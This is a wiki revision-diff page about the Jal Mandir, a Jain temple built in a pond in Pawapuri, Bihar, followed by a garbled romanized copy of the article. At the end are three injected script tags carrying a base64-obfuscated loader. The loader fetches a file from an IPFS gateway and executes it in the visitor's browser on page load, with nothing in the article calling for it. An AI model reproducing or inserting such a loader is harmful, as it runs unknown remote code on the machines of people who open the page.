Difference between revisions of "जल मंदिर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
[[चित्र:Jal-Mandir-Pawapuri.jpg|thumb|250px|जल मंदिर, [[पावापुरी]]]]
 
[[चित्र:Jal-Mandir-Pawapuri.jpg|thumb|250px|जल मंदिर, [[पावापुरी]]]]
*जल मंदिर [[बिहार]] के [[पावापुरी]] शहर में स्थित है।  
+
'''जल मंदिर''' [[बिहार]] के [[पावापुरी]] शहर में स्थित है।  
*जल मंदिर में मुख्‍य पूज्‍यनीय वस्‍तु भगवान महावीर की चरण पादुका है।
+
*जल मंदिर में मुख्‍य पूज्‍यनीय वस्‍तु भगवान [[महावीर]] की चरण पादुका है।
 
*जल मंदिर एक तालाब के बीचों-बीच बना हुआ है।  
 
*जल मंदिर एक तालाब के बीचों-बीच बना हुआ है।  
*कहा जाता है कि यहीं पर भगवान [[महावीर]] का अंतिम संस्‍कार किया गया था।  
+
*कहा जाता है कि यहीं पर भगवान महावीर का अंतिम संस्‍कार किया गया था।  
 
*ऐसा माना जाता है कि इस मंदिर का निर्माण महावीर के बड़े भाई राजा नंदीवर्द्धन ने करवाया था।  
 
*ऐसा माना जाता है कि इस मंदिर का निर्माण महावीर के बड़े भाई राजा नंदीवर्द्धन ने करवाया था।  
 
*जल मंदिर विमान आकार में बना हुआ है।  
 
*जल मंदिर विमान आकार में बना हुआ है।  
Line 10: Line 9:
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
+
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
==संबंधित लेख==
{{बिहार के पर्यटन स्थल}}
+
{{बिहार के पर्यटन स्थल}}{{जैन धर्म2}}
[[Category:जैन धर्म कोश]]
+
[[Category:जैन धर्म कोश]][[Category:धर्म कोश]]
 
[[Category:बिहार के पर्यटन स्थल]]
 
[[Category:बिहार के पर्यटन स्थल]]
 
[[Category:बिहार]]
 
[[Category:बिहार]]
Line 22: Line 21:
 
[[Category:धार्मिक स्थल कोश]]
 
[[Category:धार्मिक स्थल कोश]]
 
[[Category:जैन धार्मिक स्थल]]
 
[[Category:जैन धार्मिक स्थल]]
 +
[[Category:जैन मन्दिर]]
 
__INDEX__
 
__INDEX__

Latest revision as of 13:41, 21 March 2014

[[chitr:Jal-Mandir-Pawapuri.jpg|thumb|250px|jal mandir, pavapuri]] jal mandir bihar ke pavapuri shahar mean sthit hai.

  • jal mandir mean mukhh‍y poojh‍yaniy vash‍tu bhagavan mahavir ki charan paduka hai.
  • jal mandir ek talab ke bichoan-bich bana hua hai.
  • kaha jata hai ki yahian par bhagavan mahavir ka aantim sansh‍kar kiya gaya tha.
  • aisa mana jata hai ki is mandir ka nirman mahavir ke b de bhaee raja nandivarddhan ne karavaya tha.
  • jal mandir viman akar mean bana hua hai.
  • jal mandir tak pahuanchane ke lie 600 phit lamh‍ba pul bana hua hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>